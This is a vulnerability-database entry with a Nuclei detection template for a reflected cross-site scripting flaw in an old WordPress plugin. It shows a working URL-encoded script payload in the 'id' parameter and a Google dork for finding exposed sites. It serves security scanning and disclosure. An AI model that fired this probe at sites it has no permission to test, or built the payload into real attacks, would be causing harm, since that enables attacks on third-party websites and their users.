Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2011-5106
HistoryJul 14, 2021 - 11:17 p.m.

WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting

2021-07-1423:17:43
ProjectDiscovery
github.com
1

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6 Medium

AI Score

Confidence

High

0.004 Low

EPSS

Percentile

74.7%

A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.

id: CVE-2011-5106

info:
  name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
  remediation: |
    Update to the latest version of the plugin (version 0.1.8 or higher) which includes a fix for this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2011-5106
    - https://wordpress.org/plugins/flexible-custom-post-type/#developers
    - http://plugins.trac.wordpress.org/changeset?reponame=&new=466252%40flexible-custom-post-type&old=465583%40flexible-custom-post-type
    - http://wordpress.org/extend/plugins/flexible-custom-post-type/changelog/
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/71415
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2011-5106
    cwe-id: CWE-79
    epss-score: 0.00434
    epss-percentile: 0.74554
    cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fractalia
    product: flexible_custom_post_type
    google-query: inurl:"/wp-content/plugins/flexible-custom-post-type/"
  tags: cve,cve2011,wordpress,xss,wp-plugin,fractalia

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f2d8bf5d9480ea46483ac3aaaced8689aad71b8a211c5fd6d4a46d99c8e57eb5022100a79b8aec839add3b1c2180ff47f3be3e75701ceed4efe24247d9f4b77d793ed2:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6 Medium

AI Score

Confidence

High

0.004 Low

EPSS

Percentile

74.7%

Related for NUCLEI:CVE-2011-5106